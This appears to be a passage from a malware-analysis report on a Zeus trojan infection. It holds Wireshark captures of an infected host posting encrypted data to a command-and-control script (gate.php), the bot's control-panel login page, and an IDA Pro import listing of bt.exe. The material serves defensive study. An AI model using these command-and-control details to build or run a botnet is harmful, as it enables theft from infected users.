ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ¸eqcê<·1ÑàqHɧµ*Ϩýð"ðÇN_ý@k1 ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´-
]k%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1
vf¾fA¨ïÛéf�«åÝrŖc…¬¡XøDûìkF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1д>µ-B7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200
OK
Date: Mon, 25 Apr 2011 11:29:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
Content-Type: text/html
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 343
Connection: Keep-Alive
Pragma: no-cache
€~ÿÊ5žtÆð›Ø:‹ŗ´Ñ,ÑJè.ôX"³ÃÒ´^ü!ê Zˆ·±ŗ‰Q¶ſ !•
ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ¸eqcê<·1ÑàqHjÿ‹*Ϩýð"ðÇN_ý@k1
ñB:U-@NÈØ2oACøÿ«ë¬ÒŽð´™��%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1
vf¾fA¨ïÛéf�«åÝrŖc…¬¡XøDûìkL'Û)®iÍ´€(¤%xæ#‹çð¿}å4V=ð¬ÃŗB¸}ÝŽðý$E%hG›I•ìý¡Ñ
kK’ƒœå¶f÷f�ã&�ý´?�œíV¤ÉŔ
²©ŗ»žlDø>ÿ¹
Ü.| dŒÛ ̀ ÍáŕÑb¼
’%µR‰ÜÚÖ^VTSZ=ÍÀ/ob
ŗܸë;ƒO„kÜ¥HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:29:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=29
Connection: Keep-Alive
Content-Type: text/html
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 255
Connection: Keep-Alive
Pragma: no-cache
(~ÿÊ5žuÆðZg‡Àî^l
ìê7•Ð•"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !� ËJùßÐÛò€Nü$›ÁŸ¶j„Šl ¿̧î.: ÔŔ
¸eqcê<·1ÑàqHçµ*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´)ck%eqÿTþspŗ‹{ív/éQTÆÀI•Ž™®1vf¾fA
¨ïÛéf�«åÝrŖc…¬¡XøDûìkF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1д>µ˜D7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:30:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=28
Connection: Keep-Alive
Content-Type: text/html
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 255
Connection: Keep-Alive
Pragma: no-cache
(~ÿÊ5žuÆðˆ’RÐQoL{ „ q1Q"³ÃÒ´^ü!ê Zˆ·±ŗ‰Q¶ſ !•
ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ
¸eqcê<·1ÑàqHú§µ*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´k%eqÿTþspŗ‹{ív/éQTÆÀI•Ž™®1vf¾fA¨ï
Ûéf�«åÝrŖc…¬¡XøDûìkF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1д>µûG7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:30:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=27
Connection: Keep-Alive
Content-Type: text/html
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 255
Connection: Keep-Alive
Pragma: no-cache
(~ÿÊ5žuÆð¯!´6ˆèŒeÁr¸ÇÒä"³ÃÒ´^ü!ê Zˆ·±ŗ‰Q¶ſ !•
ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ
¸eqcê<·1ÑàqHý§µ*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´/k%eqÿTþspŗ‹{ív/éQTÆÀI•Ž™®1vf¾fA¨ï
Ûéf�«åÝrŖc…¬¡XøDûìkF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1д>µIC7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:30:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html
dellwebadmin-2:
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 343
Connection: Keep-Alive
Pragma: no-cache
€~ÿÊ5žtÆð›Ø:‹ŗ´Ñ,ÑJè.ôX"³ÃÒ´^ü!ê Zˆ·±ŗ‰Q¶ſ !•
ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ
¸eqcê<·1ÑàqHjÿ‹*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´™��%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1vf¶f
A¨ïÛéf�«åÝrŖc…¬¡XøDûìkL'Û)®iÍ´€(¤%xæ#‹çð¿}å4V=ð¬ÃŗB¸}ÝŽðý$E%hG›I•ìý¡Ñ
kK’ƒœå¶f÷f�ã&�ý´?�œíV¤ÉŔ²©ŗ»žlDø>
¢¹
Ü.| dŒÛ ̀ ÍáŕÑb¼
’%µR‰ÜÚÖ^VTSZ=ÍÀ/ob
ŗܸë;ƒO„kÜ¥HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:28:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
Content-Type: text/html
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 255
Connection: Keep-Alive
Pragma: no-cache
(~ÿÊ5žuÆðJmI¸Ò\®
¤R?pB·zÉ"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !� ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÔŔ
¸eqcê<·1ÓàqH-ſµ*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´d’i%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1vf¶fA¨ï
Ûéf�«åÝrŖc…¬¡XøDûìkF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1д>µ'C7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:28:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=29
Connection: Keep-Alive
Content-Type: text/html
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 343
Connection: Keep-Alive
Pragma: no-cache
€~ÿÊ5žtÆð›Ø:‹ŗ´Ñ,ÑJè.ôX"³ÃÒ´^ü!ê Zˆ·±ŗ‰Q¶ſ !•
ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ
¸eqcê<·1ÑàqHjÿ‹*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´™��%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1vf¶f
A¨ïÛéf�«åÝrŖc…¬¡XøDûìkL'Û)®iÍ´€(¤%xæ#‹çð¿}å4V=ð¬ÃŗB¸}ÝŽðý$E%hG›I•ìý¡Ñ
kK’ƒœå¶f÷f�ã&�ý´?�œíV¤ÉŔ²©ŗ»žlDø>
¢¹
Ü.| dŒÛ ̀ ÍáŕÑb¼
’%µR‰ÜÚÖ^VTSZ=ÍÀ/ob
ŗܸë;ƒO„kÜ¥HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:28:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=28
Connection: Keep-Alive
Content-Type: text/html
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host:xxx.com
Content-Length: 255
Connection: Keep-Alive
Pragma: no-cache
(~ÿÊ5žuÆð-jé•×9ÁY Á)íü0T"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !•
ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÔŔ
¸eqcê<·1ÑàqHſµ*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´À»i%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1vf¶fA¨ï
Ûéf�«åÝrŖc…¬¡XøDûìkF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1д>µaC7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:28:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=27
Connection: Keep-Alive
Content-Type: text/html
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 255
Connection: Keep-Alive
Pragma: no-cache
(~ÿÊ5žuÆð浪&>ˆ~}pÖëp"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !•
ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ
¸eqcê<·1ÑàqHſµ*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´aCh%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1vf¶fA¨ï
Ûéf�«åÝrŖc…¬¡XøDûìkF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1д>µ3C7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:28:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html
get:
GET /ucf/cp.php?m=login HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Pragma: no-cache
HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:29:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, pre-check=0, post-check=0
Pragma: no-cache
Set-Cookie: ref=deleted; expires=Sun, 25-Apr-2010 11:29:52 GMT; path=/ucf
Set-Cookie: p=deleted; expires=Sun, 25-Apr-2010 11:29:52 GMT; path=/ucf
Set-Cookie: u=deleted; expires=Sun, 25-Apr-2010 11:29:52 GMT; path=/ucf
Vary: Accept-Encoding
Connection: close
Content-Type: application/xhtml+xml; charset=utf-8
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>login</title>
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<link rel="stylesheet" href="theme/style.css" type="text/css" />
</head>
<body>
<form method="post" id="login" action="cp.php?m=login"><table class="tbl1"
style="width:auto"><tr><td colspan="2" class="td_hdr" align="left">Login</td></tr><tr><td colspan="1"
valign="top"><table class="tbl1" width="100%"><tr><td align="left">User name:</td><td><input
type="text" name="user" value="" maxlength="255" style="width:200px" /></td></tr><tr><td
align="left">Password:</td><td><input type="password" name="pass" value="" maxlength="255"
style="width:200px" /></td></tr><tr><td> </td><td align="left" colspan="1"><input
type="checkbox" name="remember" value="1" /> Remember (MD5
cookies)</td></tr></table></td></tr><tr><td colspan="2" align="right"><input type="submit"
value="Submit" /></td></tr></table></form>
</body>
</html>
sftsrv:
GET /ucf/cp.php?m=login HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Pragma: no-cache
HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:31:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, pre-check=0, post-check=0
Pragma: no-cache
Set-Cookie: ref=deleted; expires=Sun, 25-Apr-2010 11:31:13 GMT; path=/ucf
Set-Cookie: p=deleted; expires=Sun, 25-Apr-2010 11:31:13 GMT; path=/ucf
Set-Cookie: u=deleted; expires=Sun, 25-Apr-2010 11:31:13 GMT; path=/ucf
Vary: Accept-Encoding
Connection: close
Content-Type: application/xhtml+xml; charset=utf-8
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>login</title>
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<link rel="stylesheet" href="theme/style.css" type="text/css" />
</head>
<body>
<form method="post" id="login" action="cp.php?m=login"><table class="tbl1"
style="width:auto"><tr><td colspan="2" class="td_hdr" align="left">Login</td></tr><tr><td colspan="1"
valign="top"><table class="tbl1" width="100%"><tr><td align="left">User name:</td><td><input
type="text" name="user" value="" maxlength="255" style="width:200px" /></td></tr><tr><td
align="left">Password:</td><td><input type="password" name="pass" value="" maxlength="255"
style="width:200px" /></td></tr><tr><td> </td><td align="left" colspan="1"><input
type="checkbox" name="remember" value="1" /> Remember (MD5
cookies)</td></tr></table></td></tr><tr><td colspan="2" align="right"><input type="submit"
value="Submit" /></td></tr></table></form>
</body>
</html>
From Wireshark we learned that there is a client server relationship among the infected
host and the web server. We see a lot of port types being used to communicate back and forth.
There is no clear text found for the payloads to show us what the host is asking or giving to
the web server. It looks like the web server is sending the host xml files. We see the main files
are the gate.phpŗ and the Ŗcp.php.ŗ
IDA Pro 5 All the code to make this Zeus run correctly relies on the Ŗzse.exeŗ and the Ŗbt.exeŗ
executables. We can take a look at what is happening at the machine level and inspect the
comments from the code to see some hints in what the program is suppose to do.
Both executables were analyzed with IDA Pro 5 to find out the inputs, outputs, text
comments, the type of complier used to build the program and all the dependencies in the
code. The flow diagram is very complex for the Ŗzse.exeŗ executable and would take more
than 6 months to trace through. The Ŗbt.exeŗ executable flow diagram is more manageable
however would also take an exhausted amount of time to conquer. For this experiment the
focused was just to find out the variables and functions and make educated assumptions based
on those findings.
bt.exe
The type of compiler used to build the program is vc6win Visual C++ v6.
F (dark blue) - regular function:
start 0040D70F
A (dark green) - ascii string: aNpnitp2s_42Ucn 004010A0 a5hg5AD_fnvf9 00401A8C
aYx5RYaQlgy 00401B28
aFF2ms4dYIO 00401C1C aQXLAd?fnXdqvdA 00401C44
aHaM_ 00401C63
aGn4v89Tnpcq9ki 00402C0C aUhxp 0040360C
aEglEs?AkvucpLa 004037B1
aCV_bKv2a8p? 00403880 aHrnH8vD3GIuCdx 00403B30
aGsiNabQR6xE8yv 00403B78
a5cs8LFo3nymhn_ 00403BA1 a?fx9a65HEb 0040445C
I (purple) - imported name:
BuildTrusteeWithNameW 00413000
GetTrusteeNameA 00413004 BuildImpersonateTrusteeA 00413008
GetNamedSecurityInfoW 0041300C
CryptGetDefaultProviderA 00413010 CryptDuplicateKey 00413014
RegSetValueExW 00413018
DeregisterEventSource 0041301C BuildSecurityDescriptorA 00413020
InitiateSystemShutdownW 00413024
RegQueryMultipleValuesW 00413028 LookupAccountNameW 0041302C
RegSetKeySecurity 00413030
RegEnumValueW 00413034
SetServiceObjectSecurity 00413038
RegisterEventSourceA 0041303C
SetEntriesInAuditListW 00413040 BuildTrusteeWithSidW 00413044
RegLoadKeyW 00413048
GetOldestEventLogRecord 0041304C LookupAccountSidA 00413050
GetTrusteeTypeW 00413054
LookupPrivilegeNameA 00413058 CryptHashData 0041305C
ImpersonateNamedPipeClient 00413060
ObjectOpenAuditAlarmW 00413064 RegEnumKeyExA 00413068
BuildSecurityDescriptorW 0041306C
LookupPrivilegeValueA 00413070 DeleteAce 00413074
OpenProcessToken 00413078
DeleteService 0041307C CryptDecrypt 00413080
CreateProcessAsUserW 00413084
RevertToSelf 00413088 IsValidSecurityDescriptor 0041308C
RegReplaceKeyW 00413090
CryptAcquireContextW 00413094 LookupAccountSidW 00413098
SetEntriesInAccessListW 0041309C
RegDeleteValueA 004130A0 RegQueryValueExA 004130A4
GetSidIdentifierAuthority 004130A8
CryptGetHashParam 004130AC PrivilegedServiceAuditAlarmA 004130B0
BuildImpersonateExplicitAccessWithNameA 004130B4
GetLengthSid 004130B8
CryptImportKey 004130BC AllocateAndInitializeSid 004130C0
BuildImpersonateExplicitAccessWithNameW
004130C4
CryptSignHashW 004130C8
GetServiceDisplayNameA 004130CC
EnumDependentServicesA 004130D0 CryptReleaseContext 004130D4
GetExplicitEntriesFromAclW 004130D8
GetUserNameW 004130DC CryptEnumProvidersW 004130E0
FindFirstFreeAce 004130E4
CloseServiceHandle 004130E8 GetCurrentHwProfileW 004130EC
CancelOverlappedAccess 004130F0
StartServiceA 004130F4
GetKeyNameTextA 00413328
SetWindowPos 0041332C RegisterWindowMessageW 00413330
UnionRect 00413334
SetCaretBlinkTime 00413338 DestroyAcceleratorTable 0041333C
ChangeDisplaySettingsW 00413340
LoadImageA 00413344 SetMenuItemBitmaps 00413348
DdeUnaccessData 0041334C
DefWindowProcW 00413350 CreateIconFromResource 00413354
EditWndProc 00413358
ChangeMenuW 0041335C
DrawEdge 00413360
GetDlgItem 00413364
InternalGetWindowText 00413368 ChangeDisplaySettingsA 0041336C
InsertMenuW 00413370
SetMenuInfo 00413374 DdeSetUserHandle 00413378
GetMessageW 0041337C
ModifyMenuW 00413380 MsgWaitForMultipleObjectsEx 00413384
DrawAnimatedRects 00413388
GetUserObjectSecurity 0041338C GetMenuCheckMarkDimensions 00413390
GetMenu 00413394
DestroyCursor 00413398 IsDlgButtonChecked 0041339C
GetCaretBlinkTime 004133A0
GetShellWindow 004133A4 GetClipboardOwner 004133A8
CallWindowProcA 004133AC
GetWindowPlacement 004133B0 TabbedTextOutA 004133B4
LoadKeyboardLayoutW 004133B8
IsZoomed 004133BC CreateAcceleratorTableW 004133C0
FillRect 004133C4
RealGetWindowClass 004133C8 ToUnicodeEx 004133CC
OpenWindowStationW 004133D0
IsCharUpperA 004133D4 InvalidateRect 004133D8
GetMenuStringW 004133DC IsDialogMessageW 004133E0
ReleaseCapture 004133E4
GetSystemMenu 004133E8 SetCapture 004133EC
GrayStringA 004133F0
SwitchDesktop 004133F4
SetRect 004133F8
GetUpdateRgn 004133FC
GetDlgItemInt 00413400 LoadMenuA 00413404
CoCreateInstance 0041340C
CoRegisterMessageFilter 00413410 OleCreateLink 00413414
OleCreateEx 00413418
OleLoad 0041341C GetConvertStg 00413420
CoQueryReleaseObject 00413424
CreateDataAdviseHolder 00413428
PathFindExtensionA 00413658
SHRegGetUSValueW 0041365C UrlGetPartA 00413660
StrToIntA 00413664
StrCSpnW 00413668 PathMakeSystemFolderA 0041366C
PathFileExistsW 00413670
PathGetCharTypeA 00413674 StrRStrIW 00413678
UrlCombineW 0041367C
SHRegCreateUSKeyW 00413680 PathGetCharTypeW 00413684
PathSetDlgItemPathW 00413688
UrlCanonicalizeA 0041368C
PathIsFileSpecW 00413690
PathIsSystemFolderA 00413694
PathBuildRootW 00413698 SHRegDeleteEmptyUSKeyA 0041369C
ChrCmpIW 004136A0
SHRegGetBoolUSValueA 004136A4 PathFindFileNameA 004136A8
SHIsLowMemoryMachine 004136AC
UrlUnescapeA 004136B0 SHRegDuplicateHKey 004136B4
SHDeleteKeyW 004136B8
StrStrIW 004136BC UrlCanonicalizeW 004136C0
SHEnumKeyExW 004136C4
PathCompactPathA 004136C8 PathSkipRootA 004136CC
PathUnmakeSystemFolderW 004136D0
StrToIntExW 004136D4 PathQuoteSpacesA 004136D8
PathSearchAndQualifyA 004136DC
SHQueryValueExW 004136E0 PathRemoveArgsW 004136E4
PathFindNextComponentW 004136E8
PathIsUNCA 004136EC PathIsContentTypeA 004136F0
StrRetToBufW 004136F4
PathFindFileNameW 004136F8 SHRegDeleteUSValueA 004136FC
SHDeleteValueW 00413700
StrCSpnIA 00413704 PathCommonPrefixW 00413708
PathIsPrefixW 0041370C UrlIsNoHistoryW 00413710
SHCopyKeyW 00413714
SHDeleteKeyA 00413718 SHRegSetUSValueW 0041371C
PathRelativePathToA 00413720
PathMakePrettyW 00413724
PathAppendA 00413728
UrlIsNoHistoryA 0041372C
EnumCalendarInfoExA 00413734 Module32Next 00413738
EnumSystemLocalesW 0041373C
Heap32ListNext 00413740 GetUserDefaultLCID 00413744
EnumTimeFormatsA 00413748
lstrcmpiA 0041374C GetQueuedCompletionStatus 00413750
FreeLibrary 00413754
EnumSystemLocalesA 00413758
RegCloseKey 004130F8
RegQueryValueA 004130FC CryptVerifySignatureW 00413100
AdjustTokenPrivileges 00413104
QueryServiceStatus 00413108 RegConnectRegistryA 0041310C
GetTokenInformation 00413110
GetAccessPermissionsForObjectW 00413114 RegQueryValueW 00413118
AccessCheckAndAuditAlarmW 0041311C
SetSecurityDescriptorSacl 00413120 AreAnyAccessesGranted 00413124.
ObjectCloseAuditAlarmA 00413128
QueryServiceConfigA 0041312C ClearEventLogW 00413130
RegUnLoadKeyA 00413134
LookupPrivilegeNameW 00413138 GetSecurityInfo 0041313C
RegEnumKeyExW 00413140
ObjectPrivilegeAuditAlarmW 00413144
GetTrusteeTypeA 00413148
RegOpenKeyExW 0041314C
RegCreateKeyA 00413150 IsTextUnicode 00413154
OpenEventLogW 00413158
CryptEnumProviderTypesW 0041315C RegRestoreKeyW 00413160
CryptGetProvParam 00413164
ChangeServiceConfigA 00413168 RegSaveKeyA 0041316C
BuildExplicitAccessWithNameW 00413170
GetSecurityDescriptorSacl 00413174 RegLoadKeyA 00413178
GetMultipleTrusteeA 0041317C
AddAccessAllowedAce 00413180 SetAclInformation 00413184
ControlService 00413188
GetSecurityInfoExW 0041318C RegRestoreKeyA 00413190
ObjectOpenAuditAlarmA 00413194
CopySid 00413198 OpenSCManagerA 0041319C
RegQueryMultipleValuesA 004131A0
OpenThreadToken 004131A4 LogonUserW 004131A8
CryptDestroyHash 004131AC
AbortSystemShutdownW 004131B0 GetAclInformation 004131B4
CreateServiceW 004131B8
CryptGenKey 004131BC LookupSecurityDescriptorPartsW 004131C0
ConvertAccessToSecurityDescriptorA 004131C4 SetEntriesInAccessListA 004131C8
AbortSystemShutdownA 004131CC
SetEntriesInAclW 004131D0 GetFileSecurityA 004131D4
OpenEventLogA 004131D8
CryptSetHashParam 004131DC
CryptSetProviderExA 004131E0
QueryServiceConfigW 004131E4
CryptSetProviderExW 004131E8 OpenBackupEventLogW 004131EC
SendMessageTimeoutW 004131F4
TileChildWindows 004131F8 EndTask 004131FC
IsDialogMessageA 00413200
DdeQueryNextServer 00413204 FlashWindowEx 00413208
GetKeyboardLayoutNameA 0041320C
DdeFreeDataHandle 00413210
CoGetInterfaceAndReleaseStream 0041342C
WriteClassStm 00413430 StgGetIFillLockBytesOnFile 00413434
OleBuildVersion 00413438
OleRegEnumFormatEtc 0041343C GetRunningObjectTable 00413440
UtGetDvtd32Info 00413444
OleCreateStaticFromData 00413448 OleCreateFromFile 0041344C
OleDoAutoConvert 00413450
OpenOrCreateStream 00413454 OleNoteObjectVisible 00413458
CreateAntiMoniker 0041345C
OleMetafilePictFromIconAndLabel 00413460 CoUnmarshalInterface 00413464
OleCreateEmbeddingHelper 00413468
CoRegisterClassObject 0041346C FreePropVariantArray 00413470
OleSetAutoConvert 00413474
OleTranslateAccelerator 00413478
OleSaveToStream 0041347C
CoGetTreatAsClass 00413480
CoRevertToSelf 00413484 CoInitializeEx 00413488
OleIsCurrentClipboard 0041348C
OleConvertIStorageToOLESTREAMEx 00413490
CoGetCurrentLogicalThreadId 00413494
CreateItemMoniker 00413498 CoGetMalloc 0041349C
WriteClassStg 004134A0
ReadStringStream 004134A4 CreateGenericComposite 004134A8
PropVariantCopy 004134AC
StgOpenStorageEx 004134B0 OleSave 004134B4
IsAccelerator 004134B8
BindMoniker 004134BC CoGetCallContext 004134C0
CoFreeUnusedLibraries 004134C4
StgOpenStorage 004134C8 UpdateDCOMSettings 004134CC
CoGetMarshalSizeMax 004134D0
OleGetIconOfFile 004134D4 StgOpenStorageOnILockBytes 004134D8
CoQueryProxyBlanket 004134DC
UtConvertDvtd16toDvtd32 004134E0 CoQueryAuthenticationServices 004134E4
OleSetClipboard 004134E8
DoDragDrop 004134EC IsEqualGUID 004134F0
CoReleaseMarshalData 004134F4 OleCreate 004134F8
CoQueryClientBlanket 004134FC
ReadClassStm 00413500 ReleaseStgMedium 00413504
CreateFileMoniker 00413508
OleSetMenuDescriptor 0041350C
CreatePointerMoniker 00413510
CoTreatAsClass 00413514
CoFreeAllLibraries 00413518 StgGetIFillLockBytesOnILockBytes 0041351C
CreateILockBytesOnHGlobal 00413520
CreateObjrefMoniker 00413524 CreateBindCtx 00413528
StringFromIID 0041352C
CoInitializeSecurity 00413530 CoBuildVersion 00413534
WriteStringStream 00413538
CoCreateFreeThreadedMarshaler 0041353C
Thread32First 0041375C
GetNamedPipeInfo 00413760 GlobalUnlock 00413764
FreeEnvironmentStringsA 00413768
GlobalFree 0041376C GetCurrentThread 00413770
PeekConsoleInputA 00413774
FindResourceExA 00413778 VirtualProtect 0041377C
OpenProcess 00413780
GetSystemDefaultLangID 00413784 GetEnvironmentStringsA 00413788
VirtualAlloc 0041378C
HeapLock 00413790 ConvertDefaultLocale 00413794
SetVolumeLabelW 00413798
SizeofResource 0041379C SetFileApisToOEM 004137A0
FileTimeToLocalFileTime 004137A4
GetFullPathNameW 004137A8
GetDiskFreeSpaceW 004137AC
SetSystemTime 004137B0
EnumDateFormatsExW 004137B4 CallNamedPipeA 004137B8
FindCloseChangeNotification 004137BC
SetEvent 004137C0 SetProcessPriorityBoost 004137C4
IsBadWritePtr 004137C8
TerminateThread 004137CC EnumResourceTypesW 004137D0
GetPrivateProfileIntW 004137D4
OpenFileMappingA 004137D8 CopyFileA 004137DC
lstrcpyn 004137E0
ReadConsoleW 004137E4 PeekNamedPipe 004137E8
CreateNamedPipeW 004137EC
CreateDirectoryExA 004137F0 SetThreadLocale 004137F4
ClearCommBreak 004137F8
SetStdHandle 004137FC GetNumberOfConsoleMouseButtons 00413800
GetFileAttributesExW 00413804
WriteConsoleOutputW 00413808 FlushViewOfFile 0041380C
PulseEvent 00413810
GetLocalTime 00413814 GetWindowsDirectoryA 00413818
SetCommConfig 0041381C
GetFileAttributesW 00413820 GetConsoleTitleA 00413824
SetProcessAffinityMask 00413828 GetSystemInfo 0041382C
FlushInstructionCache 00413830
SwitchToThread 00413834 GetCurrentProcessId 00413838
DosDateTimeToFileTime 0041383C
EscapeCommFunction 00413840
HeapDestroy 00413844
SetCurrentDirectoryA 00413848
GetConsoleScreenBufferInfo 0041384C FindFirstFileA 00413850
CreateNamedPipeA 00413854
GetThreadLocale 00413858 GetTempFileNameA 0041385C
GlobalUnWire 00413860
SwitchToFiber 00413864 LocalFileTimeToFileTime 00413868
CreateTapePartition 0041386C
GlobalAddAtomW 00413870
SetThreadDesktop 00413214
GetInputState 00413218 SetKeyboardState 0041321C
SetMenuItemInfoW 00413220
GetMenuItemID 00413224 GrayStringW 00413228
EmptyClipboard 0041322C
CreatePopupMenu 00413230 LoadStringW 00413234
CallMsgFilterA 00413238
GetActiveWindow 0041323C RegisterHotKey 00413240
DialogBoxParamA 00413244
ExcludeUpdateRgn 00413248 GetAncestor 0041324C
GetSysColor 00413250
GetDlgCtrlID 00413254 DdeFreeStringHandle 00413258
LoadStringA 0041325C
MonitorFromWindow 00413260
SetDeskWallpaper 00413264
DrawFrame 00413268
RegisterWindowMessageA 0041326C GetMenuItemRect 00413270
LoadMenuIndirectW 00413274
EnumDisplaySettingsExW 00413278 BeginDeferWindowPos 0041327C
OemToCharW 00413280
